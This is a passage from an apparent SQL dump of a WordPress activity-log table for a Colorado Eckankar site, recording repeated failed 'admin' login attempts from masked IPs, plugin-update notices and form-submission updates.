Safari/537.36'),(222477,37032,'_message_key','user_unknown_login_failed'),(222478,37032,'_server_remote_addr','8.129.212.x'),(222479,37033,'failed_username','admin'),(222480,37033,'server_http_user_agent','Mozilla/5.0'),(222481,37033,'_message_key','user_unknown_login_failed'),(222482,37033,'_server_remote_addr','45.136.118.x'),(222483,37034,'failed_username','admin'),(222484,37034,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(222485,37034,'_message_key','user_unknown_login_failed'),(222486,37034,'_server_remote_addr','209.97.169.x'),(222487,37035,'failed_username','admin'),(222488,37035,'server_http_user_agent','Mozilla/5.0'),(222489,37035,'_message_key','user_unknown_login_failed'),(222490,37035,'_server_remote_addr','45.136.118.x'),(222491,37036,'failed_username','admin'),(222492,37036,'server_http_user_agent','Mozilla/5.0'),(222493,37036,'_message_key','user_unknown_login_failed'),(222494,37036,'_server_remote_addr','45.136.118.x'),(222495,37037,'failed_username','admin'),(222496,37037,'server_http_user_agent','Mozilla/5.0'),(222497,37037,'_message_key','user_unknown_login_failed'),(222498,37037,'_server_remote_addr','45.136.118.x'),(222499,37038,'failed_username','admin'),(222500,37038,'server_http_user_agent','Mozilla/5.0'),(222501,37038,'_message_key','user_unknown_login_failed'),(222502,37038,'_server_remote_addr','45.136.118.x'),(222503,37039,'failed_username','admin'),(222504,37039,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(222505,37039,'_message_key','user_unknown_login_failed'),(222506,37039,'_server_remote_addr','89.39.109.x'),(222507,37040,'failed_username','admin'),(222508,37040,'server_http_user_agent','Mozilla/5.0'),(222509,37040,'_message_key','user_unknown_login_failed'),(222510,37040,'_server_remote_addr','45.136.118.x'),(222511,37041,'failed_username','admin'),(222512,37041,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(222513,37041,'_message_key','user_unknown_login_failed'),(222514,37041,'_server_remote_addr','221.120.103.x'),(222515,37042,'failed_username','admin'),(222516,37042,'server_http_user_agent','Mozilla/5.0'),(222517,37042,'_message_key','user_unknown_login_failed'),(222518,37042,'_server_remote_addr','45.136.118.x'),(222519,37043,'failed_username','admin'),(222520,37043,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(222521,37043,'_message_key','user_unknown_login_failed'),(222522,37043,'_xmlrpc_request','true'),(222523,37043,'_server_remote_addr','157.245.195.x'),(222524,37044,'failed_username','admin'),(222525,37044,'server_http_user_agent','Mozilla/5.0'),(222526,37044,'_message_key','user_unknown_login_failed'),(222527,37044,'_server_remote_addr','45.136.118.x'),(222528,37045,'failed_username','admin'),(222529,37045,'server_http_user_agent','Mozilla/5.0'),(222530,37045,'_message_key','user_unknown_login_failed'),(222531,37045,'_server_remote_addr','45.136.118.x'),(222532,37046,'plugin_name','Really Simple SSL'),(222533,37046,'plugin_current_version','7.0.9'),(222534,37046,'plugin_new_version','7.1.3'),(222535,37046,'_message_key','plugin_update_available'),(222536,37046,'_server_remote_addr','173.231.231.x'),(222537,37047,'failed_username','admin'),(222538,37047,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(222539,37047,'_message_key','user_unknown_login_failed'),(222540,37047,'_server_remote_addr','69.43.139.x'),(222541,37048,'failed_username','admin'),(222542,37048,'server_http_user_agent','Mozilla/5.0'),(222543,37048,'_message_key','user_unknown_login_failed'),(222544,37048,'_server_remote_addr','45.136.118.x'),(222545,37049,'failed_username','admin'),(222546,37049,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(222547,37049,'_message_key','user_unknown_login_failed'),(222548,37049,'_server_remote_addr','47.107.131.x'),(222549,37050,'failed_username','admin'),(222550,37050,'server_http_user_agent','Mozilla/5.0'),(222551,37050,'_message_key','user_unknown_login_failed'),(222552,37050,'_server_remote_addr','45.136.118.x'),(222553,37051,'failed_username','admin'),(222554,37051,'server_http_user_agent','Mozilla/5.0'),(222555,37051,'_message_key','user_unknown_login_failed'),(222556,37051,'_server_remote_addr','45.136.118.x'),(222557,37052,'failed_username','admin'),(222558,37052,'server_http_user_agent','Mozilla/5.0'),(222559,37052,'_message_key','user_unknown_login_failed'),(222560,37052,'_server_remote_addr','45.136.118.x'),(222561,37053,'failed_username','admin'),(222562,37053,'server_http_user_agent','Mozilla/5.0'),(222563,37053,'_message_key','user_unknown_login_failed'),(222564,37053,'_server_remote_addr','45.136.118.x'),(222565,37054,'failed_username','admin'),(222566,37054,'server_http_user_agent','Mozilla/5.0'),(222567,37054,'_message_key','user_unknown_login_failed'),(222568,37054,'_server_remote_addr','45.136.118.x'),(222569,37055,'failed_username','admin'),(222570,37055,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(222571,37055,'_message_key','user_unknown_login_failed'),(222572,37055,'_server_remote_addr','165.227.89.x'),(222573,37056,'failed_username','admin'),(222574,37056,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(222575,37056,'_message_key','user_unknown_login_failed'),(222576,37056,'_server_remote_addr','34.75.65.x'),(222577,37057,'failed_username','admin'),(222578,37057,'server_http_user_agent','Mozilla/5.0'),(222579,37057,'_message_key','user_unknown_login_failed'),(222580,37057,'_server_remote_addr','45.136.118.x'),(222581,37058,'failed_username','admin'),(222582,37058,'server_http_user_agent','Mozilla/5.0'),(222583,37058,'_message_key','user_unknown_login_failed'),(222584,37058,'_server_remote_addr','45.136.118.x'),(222585,37059,'failed_username','admin'),(222586,37059,'server_http_user_agent','Mozilla/5.0'),(222587,37059,'_message_key','user_unknown_login_failed'),(222588,37059,'_server_remote_addr','45.136.118.x'),(222589,37060,'failed_username','admin'),(222590,37060,'server_http_user_agent','Mozilla/5.0'),(222591,37060,'_message_key','user_unknown_login_failed'),(222592,37060,'_server_remote_addr','45.136.118.x'),(222593,37061,'failed_username','admin'),(222594,37061,'server_http_user_agent','Mozilla/5.0'),(222595,37061,'_message_key','user_unknown_login_failed'),(222596,37061,'_server_remote_addr','45.136.118.x'),(222597,37062,'failed_username','admin'),(222598,37062,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(222599,37062,'_message_key','user_unknown_login_failed'),(222600,37062,'_server_remote_addr','34.75.65.x'),(222601,37063,'failed_username','admin'),(222602,37063,'server_http_user_agent','Mozilla/5.0'),(222603,37063,'_message_key','user_unknown_login_failed'),(222604,37063,'_server_remote_addr','45.136.118.x'),(222605,37064,'failed_username','admin'),(222606,37064,'server_http_user_agent','Mozilla/5.0'),(222607,37064,'_message_key','user_unknown_login_failed'),(222608,37064,'_server_remote_addr','45.136.118.x'),(222609,37065,'failed_username','admin'),(222610,37065,'server_http_user_agent','Mozilla/5.0'),(222611,37065,'_message_key','user_unknown_login_failed'),(222612,37065,'_server_remote_addr','45.136.118.x'),(222613,37066,'failed_username','admin'),(222614,37066,'server_http_user_agent','Mozilla/5.0'),(222615,37066,'_message_key','user_unknown_login_failed'),(222616,37066,'_server_remote_addr','45.136.118.x'),(222617,37067,'failed_username','admin'),(222618,37067,'server_http_user_agent','Mozilla/5.0'),(222619,37067,'_message_key','user_unknown_login_failed'),(222620,37067,'_server_remote_addr','45.136.118.x'),(222621,37068,'failed_username','admin'),(222622,37068,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(222623,37068,'_message_key','user_unknown_login_failed'),(222624,37068,'_server_remote_addr','34.65.234.x'),(222625,37069,'failed_username','admin'),(222626,37069,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(222627,37069,'_message_key','user_unknown_login_failed'),(222628,37069,'_server_remote_addr','156.54.11.x'),(222629,37070,'failed_username','admin'),(222630,37070,'server_http_user_agent','Mozilla/5.0'),(222631,37070,'_message_key','user_unknown_login_failed'),(222632,37070,'_server_remote_addr','45.136.118.x'),(222633,37071,'failed_username','admin'),(222634,37071,'server_http_user_agent','Mozilla/5.0'),(222635,37071,'_message_key','user_unknown_login_failed'),(222636,37071,'_server_remote_addr','45.136.118.x'),(222637,37072,'post_id','269194'),(222638,37072,'post_type','nf_sub'),(222639,37072,'post_title',''),(222640,37072,'_message_key','post_updated'),(222641,37072,'_server_remote_addr','71.56.223.x'),(222642,37072,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_Reminder_Week_2&utm_medium=email'),(222643,37073,'failed_username','admin'),(222644,37073,'server_http_user_agent','Mozilla/5.0'),(222645,37073,'_message_key','user_unknown_login_failed'),(222646,37073,'_server_remote_addr','45.136.118.x'),(222647,37074,'failed_username','admin'),(222648,37074,'server_http_user_agent','Mozilla/5.0'),(222649,37074,'_message_key','user_unknown_login_failed'),(222650,37074,'_server_remote_addr','45.136.118.x'),(222651,37075,'failed_username','admin'),(222652,37075,'server_http_user_agent','Mozilla/5.0'),(222653,37075,'_message_key','user_unknown_login_failed'),(222654,37075,'_server_remote_addr','45.136.118.x'),(222655,37076,'failed_username','admin'),(222656,37076,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(222657,37076,'_message_key','user_unknown_login_failed'),(222658,37076,'_server_remote_addr','181.39.113.x'),(222659,37077,'failed_username','admin'),(222660,37077,'server_http_user_agent','Mozilla/5.0'),(222661,37077,'_message_key','user_unknown_login_failed'),(222662,37077,'_server_remote_addr','45.136.118.x'),(222663,37078,'failed_username','admin'),(222664,37078,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(222665,37078,'_message_key','user_unknown_login_failed'),(222666,37078,'_server_remote_addr','192.71.144.x'),(222667,37079,'failed_username','admin'),(222668,37079,'server_http_user_agent','Mozilla/5.0'),(222669,37079,'_message_key','user_unknown_login_failed'),(222670,37079,'_server_remote_addr','45.136.118.x'),(222671,37080,'failed_username','admin'),(222672,37080,'server_http_user_agent','Mozilla/5.0'),(222673,37080,'_message_key','user_unknown_login_failed'),(222674,37080,'_server_remote_addr','45.136.118.x'),(222675,37081,'failed_username','admin'),(222676,37081,'server_http_user_agent','Mozilla/5.0'),(222677,37081,'_message_key','user_unknown_login_failed'),(222678,37081,'_server_remote_addr','45.136.118.x'),(222679,37082,'failed_username','admin'),(222680,37082,'server_http_user_agent','Mozilla/5.0'),(222681,37082,'_message_key','user_unknown_login_failed'),(222682,37082,'_server_remote_addr','45.136.118.x'),(222683,37083,'failed_username','admin'),(222684,37083,'server_http_user_agent','Mozilla/5.0'),(222685,37083,'_message_key','user_unknown_login_failed'),(222686,37083,'_server_remote_addr','45.136.118.x'),(222687,37084,'failed_username','admin'),(222688,37084,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(222689,37084,'_message_key','user_unknown_login_failed'),(222690,37084,'_server_remote_addr','81.70.248.x'),(222691,37085,'failed_username','wadminw'),(222692,37085,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(222693,37085,'_message_key','user_unknown_login_failed'),(222694,37085,'_server_remote_addr','181.39.113.x'),(222695,37086,'failed_username','admin'),(222696,37086,'server_http_user_agent','Mozilla/5.0'),(222697,37086,'_message_key','user_unknown_login_failed'),(222698,37086,'_server_remote_addr','45.136.118.x'),(222699,37087,'failed_username','wadminw'),(222700,37087,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(222701,37087,'_message_key','user_unknown_login_failed'),(222702,37087,'_server_remote_addr','111.230.202.x'),(222703,37088,'failed_username','admin'),(222704,37088,'server_http_user_agent','Mozilla/5.0'),(222705,37088,'_message_key','user_unknown_login_failed'),(222706,37088,'_server_remote_addr','45.136.118.x'),(222707,37089,'failed_username','admin'),(222708,37089,'server_http_user_agent','Mozilla/5.0'),(222709,37089,'_message_key','user_unknown_login_failed'),(222710,37089,'_server_remote_addr','45.136.118.x'),(222711,37090,'failed_username','admin'),(222712,37090,'server_http_user_agent','Mozilla/5.0'),(222713,37090,'_message_key','user_unknown_login_failed'),(222714,37090,'_server_remote_addr','45.136.118.x'),(222715,37091,'failed_username','admin'),(222716,37091,'server_http_user_agent','Mozilla/5.0'),(222717,37091,'_message_key','user_unknown_login_failed'),(222718,37091,'_server_remote_addr','45.136.118.x'),(222719,37092,'failed_username','admin'),(222720,37092,'server_http_user_agent','Mozilla/5.0'),(222721,37092,'_message_key','user_unknown_login_failed'),(222722,37092,'_server_remote_addr','45.136.118.x'),(222723,37093,'failed_username','wwwadmin'),(222724,37093,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(222725,37093,'_message_key','user_unknown_login_failed'),(222726,37093,'_server_remote_addr','35.187.58.x'),(222727,37094,'failed_username','wwwadmin'),(222728,37094,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(222729,37094,'_message_key','user_unknown_login_failed'),(222730,37094,'_server_remote_addr','8.219.51.x'),(222731,37095,'failed_username','admin'),(222732,37095,'server_http_user_agent','Mozilla/5.0'),(222733,37095,'_message_key','user_unknown_login_failed'),(222734,37095,'_server_remote_addr','45.136.118.x'),(222735,37096,'failed_username','admin'),(222736,37096,'server_http_user_agent','Mozilla/5.0'),(222737,37096,'_message_key','user_unknown_login_failed'),(222738,37096,'_server_remote_addr','45.136.118.x'),(222739,37097,'failed_username','admin'),(222740,37097,'server_http_user_agent','Mozilla/5.0'),(222741,37097,'_message_key','user_unknown_login_failed'),(222742,37097,'_server_remote_addr','45.136.118.x'),(222743,37098,'post_id','269195'),(222744,37098,'post_type','nf_sub'),(222745,37098,'post_title',''),(222746,37098,'_message_key','post_updated'),(222747,37098,'_server_remote_addr','107.77.197.x'),(222748,37098,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(222749,37099,'failed_username','admin'),(222750,37099,'server_http_user_agent','Mozilla/5.0'),(222751,37099,'_message_key','user_unknown_login_failed'),(222752,37099,'_server_remote_addr','45.136.118.x'),(222753,37100,'failed_username','admin'),(222754,37100,'server_http_user_agent','Mozilla/5.0'),(222755,37100,'_message_key','user_unknown_login_failed'),(222756,37100,'_server_remote_addr','45.136.118.x'),(222757,37101,'failed_username','admin'),(222758,37101,'server_http_user_agent','Mozilla/5.0'),(222759,37101,'_message_key','user_unknown_login_failed'),(222760,37101,'_server_remote_addr','45.136.118.x'),(222761,37102,'failed_username','admin'),(222762,37102,'server_http_user_agent','Mozilla/5.0'),(222763,37102,'_message_key','user_unknown_login_failed'),(222764,37102,'_server_remote_addr','45.136.118.x'),(222765,37103,'failed_username','admin'),(222766,37103,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(222767,37103,'_message_key','user_unknown_login_failed'),(222768,37103,'_server_remote_addr','134.122.123.x'),(222769,37104,'failed_username','admin'),(222770,37104,'server_http_user_agent','Mozilla/5.0'),(222771,37104,'_message_key','user_unknown_login_failed'),(222772,37104,'_server_remote_addr','45.136.118.x'),(222773,37105,'failed_username','admin'),(222774,37105,'server_http_user_agent','Mozilla/5.0'),(222775,37105,'_message_key','user_unknown_login_failed'),(222776,37105,'_server_remote_addr','45.136.118.x'),(222777,37106,'failed_username','admin'),(222778,37106,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(222779,37106,'_message_key','user_unknown_login_failed'),(222780,37106,'_server_remote_addr','54.36.173.x'),(222781,37107,'failed_username','admin'),(222782,37107,'server_http_user_agent','Mozilla/5.0'),(222783,37107,'_message_key','user_unknown_login_failed'),(222784,37107,'_server_remote_addr','45.136.118.x'),(222785,37108,'failed_username','admin'),(222786,37108,'server_http_user_agent','Mozilla/5.0'),(222787,37108,'_message_key','user_unknown_login_failed'),(222788,37108,'_server_remote_addr','20.150.218.x'),(222789,37109,'failed_username','admin'),(222790,37109,'server_http_user_agent','Mozilla/5.0'),(222791,37109,'_message_key','user_unknown_login_failed'),(222792,37109,'_server_remote_addr','45.136.118.x'),(222793,37110,'failed_username','admin'),(222794,37110,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(222795,37110,'_message_key','user_unknown_login_failed'),(222796,37110,'_server_remote_addr','13.75.189.x'),(222797,37111,'failed_username','admin'),(222798,37111,'server_http_user_agent','Mozilla/5.0'),(222799,37111,'_message_key','user_unknown_login_failed'),(222800,37111,'_server_remote_addr','20.150.218.x'),(222801,37112,'failed_username','admin'),(222802,37112,'server_http_user_agent','Mozilla/5.0'),(222803,37112,'_message_key','user_unknown_login_failed'),(222804,37112,'_server_remote_addr','45.136.118.x'),(222805,37113,'failed_username','admin'),(222806,37113,'server_http_user_agent','Mozilla/5.0'),(222807,37113,'_message_key','user_unknown_login_failed'),(222808,37113,'_server_remote_addr','20.150.218.x'),(222809,37114,'failed_username','admin'),(222810,37114,'server_http_user_agent','Mozilla/5.0'),(222811,37114,'_message_key','user_unknown_login_failed'),(222812,37114,'_server_remote_addr','45.136.118.x'),(222813,37115,'failed_username','admin'),(222814,37115,'server_http_user_agent','Mozilla/5.0'),(222815,37115,'_message_key','user_unknown_login_failed'),(222816,37115,'_server_remote_addr','20.150.218.x'),(222817,37116,'failed_username','admin'),(222818,37116,'server_http_user_agent','Mozilla/5.0'),(222819,37116,'_message_key','user_unknown_login_failed'),(222820,37116,'_server_remote_addr','45.136.118.x'),(222821,37117,'failed_username','admin'),(222822,37117,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(222823,37117,'_message_key','user_unknown_login_failed'),(222824,37117,'_server_remote_addr','209.97.169.x'),(222825,37118,'failed_username','admin'),(222826,37118,'server_http_user_agent','Mozilla/5.0'),(222827,37118,'_message_key','user_unknown_login_failed'),(222828,37118,'_server_remote_addr','20.150.218.x'),(222829,37119,'failed_username','admin'),(222830,37119,'server_http_user_agent','Mozilla/5.0'),(222831,37119,'_message_key','user_unknown_login_failed'),(222832,37119,'_server_remote_addr','45.136.118.x'),(222833,37120,'failed_username','admin'),(222834,37120,'server_http_user_agent','Mozilla/5.0'),(222835,37120,'_message_key','user_unknown_login_failed'),(222836,37120,'_server_remote_addr','45.136.118.x'),(222837,37121,'failed_username','admin'),(222838,37121,'server_http_user_agent','Mozilla/5.0'),(222839,37121,'_message_key','user_unknown_login_failed'),(222840,37121,'_server_remote_addr','20.150.218.x'),(222841,37122,'failed_username','admin'),(222842,37122,'server_http_user_agent','Mozilla/5.0'),(222843,37122,'_message_key','user_unknown_login_failed'),(222844,37122,'_server_remote_addr','45.136.118.x'),(222845,37123,'failed_username','admin'),(222846,37123,'server_http_user_agent','Mozilla/5.0'),(222847,37123,'_message_key','user_unknown_login_failed'),(222848,37123,'_server_remote_addr','20.150.218.x'),(222849,37124,'plugin_name','Ninja Forms'),(222850,37124,'plugin_current_version','3.6.32'),(222851,37124,'plugin_new_version','3.6.34'),(222852,37124,'_message_key','plugin_update_available'),(222853,37124,'_server_remote_addr','173.231.231.x'),(222854,37125,'failed_username','admin'),(222855,37125,'server_http_user_agent','Mozilla/5.0'),(222856,37125,'_message_key','user_unknown_login_failed'),(222857,37125,'_server_remote_addr','45.136.118.x'),(222858,37126,'failed_username','admin'),(222859,37126,'server_http_user_agent','Mozilla/5.0'),(222860,37126,'_message_key','user_unknown_login_failed'),(222861,37126,'_server_remote_addr','20.150.218.x'),(222862,37127,'failed_username','admin'),(222863,37127,'server_http_user_agent','Mozilla/5.0'),(222864,37127,'_message_key','user_unknown_login_failed'),(222865,37127,'_server_remote_addr','45.136.118.x'),(222866,37128,'failed_username','admin'),(222867,37128,'server_http_user_agent','Mozilla/5.0'),(222868,37128,'_message_key','user_unknown_login_failed'),(222869,37128,'_server_remote_addr','20.150.218.x'),(222870,37129,'failed_username','admin'),(222871,37129,'server_http_user_agent','Mozilla/5.0'),(222872,37129,'_message_key','user_unknown_login_failed'),(222873,37129,'_server_remote_addr','45.136.118.x'),(222874,37130,'failed_username','admin'),(222875,37130,'server_http_user_agent','Mozilla/5.0'),(222876,37130,'_message_key','user_unknown_login_failed'),(222877,37130,'_server_remote_addr','20.150.218.x'),(222878,37131,'failed_username','admin'),(222879,37131,'server_http_user_agent','Mozilla/5.0'),(222880,37131,'_message_key','user_unknown_login_failed'),(222881,37131,'_server_remote_addr','45.136.118.x'),(222882,37132,'failed_username','admin'),(222883,37132,'server_http_user_agent','Mozilla/5.0'),(222884,37132,'_message_key','user_unknown_login_failed'),(222885,37132,'_server_remote_addr','20.150.218.x'),(222886,37133,'failed_username','admin'),(222887,37133,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(222888,37133,'_message_key','user_unknown_login_failed'),(222889,37133,'_server_remote_addr','223.29.197.x'),(222890,37134,'failed_username','admin'),(222891,37134,'server_http_user_agent','Mozilla/5.0'),(222892,37134,'_message_key','user_unknown_login_failed'),(222893,37134,'_server_remote_addr','45.136.118.x'),(222894,37135,'failed_username','admin'),(222895,37135,'server_http_user_agent','Mozilla/5.0'),(222896,37135,'_message_key','user_unknown_login_failed'),(222897,37135,'_server_remote_addr','20.150.218.x'),(222898,37136,'failed_username','admin'),(222899,37136,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(222900,37136,'_message_key','user_unknown_login_failed'),(222901,37136,'_server_remote_addr','13.200.64.x'),(222902,37137,'failed_username','admin'),(222903,37137,'server_http_user_agent','Mozilla/5.0'),(222904,37137,'_message_key','user_unknown_login_failed'),(222905,37137,'_server_remote_addr','45.136.118.x'),(222906,37138,'failed_username','admin'),(222907,37138,'server_http_user_agent','Mozilla/5.0'),(222908,37138,'_message_key','user_unknown_login_failed'),(222909,37138,'_server_remote_addr','20.150.218.x'),(222910,37139,'failed_username','admin'),(222911,37139,'server_http_user_agent','Mozilla/5.0'),(222912,37139,'_message_key','user_unknown_login_failed'),(222913,37139,'_server_remote_addr','45.136.118.x'),(222914,37140,'failed_username','admin'),(222915,37140,'server_http_user_agent','Mozilla/5.0'),(222916,37140,'_message_key','user_unknown_login_failed'),(222917,37140,'_server_remote_addr','20.150.218.x'),(222918,37141,'failed_username','admin'),(222919,37141,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(222920,37141,'_message_key','user_unknown_login_failed'),(222921,37141,'_server_remote_addr','146.190.71.x'),(222922,37142,'failed_username','admin'),(222923,37142,'server_http_user_agent','Mozilla/5.0'),(222924,37142,'_message_key','user_unknown_login_failed'),(222925,37142,'_server_remote_addr','45.136.118.x'),(222926,37143,'failed_username','admin'),(222927,37143,'server_http_user_agent','Mozilla/5.0'),(222928,37143,'_message_key','user_unknown_login_failed'),(222929,37143,'_server_remote_addr','20.150.218.x'),(222930,37144,'failed_username','admin'),(222931,37144,'server_http_user_agent','Mozilla/5.0'),(222932,37144,'_message_key','user_unknown_login_failed'),(222933,37144,'_server_remote_addr','45.136.118.x'),(222934,37145,'failed_username','admin'),(222935,37145,'server_http_user_agent','Mozilla/5.0'),(222936,37145,'_message_key','user_unknown_login_failed'),(222937,37145,'_server_remote_addr','20.150.218.x'),(222938,37146,'failed_username','admin'),(222939,37146,'server_http_user_agent','Mozilla/5.0'),(222940,37146,'_message_key','user_unknown_login_failed'),(222941,37146,'_server_remote_addr','45.136.118.x'),(222942,37147,'failed_username','admin'),(222943,37147,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(222944,37147,'_message_key','user_unknown_login_failed'),(222945,37147,'_server_remote_addr','51.15.228.x'),(222946,37148,'failed_username','admin'),(222947,37148,'server_http_user_agent','Mozilla/5.0'),(222948,37148,'_message_key','user_unknown_login_failed'),(222949,37148,'_server_remote_addr','20.150.218.x'),(222950,37149,'failed_username','admin'),(222951,37149,'server_http_user_agent','Mozilla/5.0'),(222952,37149,'_message_key','user_unknown_login_failed'),(222953,37149,'_server_remote_addr','45.136.118.x'),(222954,37150,'failed_username','admin'),(222955,37150,'server_http_user_agent','Mozilla/5.0'),(222956,37150,'_message_key','user_unknown_login_failed'),(222957,37150,'_server_remote_addr','20.150.218.x'),(222958,37151,'failed_username','admin'),(222959,37151,'server_http_user_agent','Mozilla/5.0'),(222960,37151,'_message_key','user_unknown_login_failed'),(222961,37151,'_server_remote_addr','45.136.118.x'),(222962,37152,'failed_username','admin'),(222963,37152,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(222964,37152,'_message_key','user_unknown_login_failed'),(222965,37152,'_xmlrpc_request','true'),(222966,37152,'_server_remote_addr','150.158.151.x'),(222967,37152,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(222968,37153,'failed_username','admin'),(222969,37153,'server_http_user_agent','Mozilla/5.0'),(222970,37153,'_message_key','user_unknown_login_failed'),(222971,37153,'_server_remote_addr','20.150.218.x'),(222972,37154,'failed_username','admin'),(222973,37154,'server_http_user_agent','Mozilla/5.0'),(222974,37154,'_message_key','user_unknown_login_failed'),(222975,37154,'_server_remote_addr','45.136.118.x'),(222976,37155,'failed_username','admin'),(222977,37155,'server_http_user_agent','Mozilla/5.0'),(222978,37155,'_message_key','user_unknown_login_failed'),(222979,37155,'_server_remote_addr','20.150.218.x'),(222980,37156,'failed_username','admin'),(222981,37156,'server_http_user_agent','Mozilla/5.0'),(222982,37156,'_message_key','user_unknown_login_failed'),(222983,37156,'_server_remote_addr','45.136.118.x'),(222984,37157,'post_id','269196'),(222985,37157,'post_type','nf_sub'),(222986,37157,'post_title',''),(222987,37157,'_message_key','post_updated'),(222988,37157,'_server_remote_addr','97.118.76.x'),(222989,37157,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_Reminder_Week_2&utm_medium=email'),(222990,37158,'failed_username','admin'),(222991,37158,'server_http_user_agent','Mozilla/5.0'),(222992,37158,'_message_key','user_unknown_login_failed'),(222993,37158,'_server_remote_addr','20.150.218.x'),(222994,37159,'failed_username','admin'),(222995,37159,'server_http_user_agent','Mozilla/5.0'),(222996,37159,'_message_key','user_unknown_login_failed'),(222997,37159,'_server_remote_addr','45.136.118.x'),(222998,37160,'failed_username','admin'),(222999,37160,'server_http_user_agent','Mozilla/5.0'),(223000,37160,'_message_key','user_unknown_login_failed'),(223001,37160,'_server_remote_addr','20.150.218.x'),(223002,37161,'failed_username','admin'),(223003,37161,'server_http_user_agent','Mozilla/5.0'),(223004,37161,'_message_key','user_unknown_login_failed'),(223005,37161,'_server_remote_addr','45.136.118.x'),(223006,37162,'failed_username','admin'),(223007,37162,'server_http_user_agent','Mozilla/5.0'),(223008,37162,'_message_key','user_unknown_login_failed'),(223009,37162,'_server_remote_addr','20.150.218.x'),(223010,37163,'failed_username','admin'),(223011,37163,'server_http_user_agent','Mozilla/5.0'),(223012,37163,'_message_key','user_unknown_login_failed'),(223013,37163,'_server_remote_addr','45.136.118.x'),(223014,37164,'failed_username','admin'),(223015,37164,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 